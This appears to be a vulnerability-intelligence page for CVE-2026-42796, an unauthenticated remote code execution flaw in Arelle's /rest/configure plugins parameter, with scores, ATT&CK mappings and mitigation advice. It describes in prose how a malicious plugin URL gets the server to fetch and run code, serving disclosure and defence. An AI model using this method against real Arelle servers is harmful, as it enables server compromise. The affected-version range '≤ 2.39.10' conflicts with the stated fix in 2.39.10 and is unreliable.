Cyber Resilience

CVE-2026-42796

CriticalPublic PoC

Published: 04 May 2026

Published
04 May 2026
Modified
27 May 2026
KEV Added
Patch
CVSS Score v4 9.2 CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0073 49.8th percentile
Risk Priority 70 floored blend · peak EPSS

Summary

CVE-2026-42796 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability in Workiva Arelle. Its CVSS base score is 9.2 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 49.8th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-14 (Permitted Actions Without Identification or Authentication) and AC-3 (Access Enforcement).

Deeper analysis

CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).

Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.

Mitigation is available through upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and exploitation are provided in the Vulncheck advisory.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious…

more

Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.006 Python Execution
Adversaries may abuse Python commands and scripts for execution.
T1105 Ingress Tool Transfer Command And Control
Adversaries may transfer tools or other files from an external system into a compromised environment.
Why these techniques?

Unauthenticated RCE in public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). Attacker-supplied URL causes server-side download (T1105 Ingress Tool Transfer) followed by Python execution (T1059.006) with process privileges.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-27509Shared CWE-306
CVE-2025-24865Shared CWE-306
CVE-2026-4810Shared CWE-306
CVE-2025-53847Shared CWE-306
CVE-2025-61757Shared CWE-306
CVE-2025-68715Shared CWE-306
CVE-2026-21992Shared CWE-306
CVE-2025-26362Shared CWE-306
CVE-2026-48692Shared CWE-306
CVE-2022-50981Shared CWE-306

Affected Assets

workiva
arelle
≤ 2.39.10

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions like the /rest/configure endpoint's plugins parameter that enables remote code execution.

prevent

Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.

prevent

Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.

References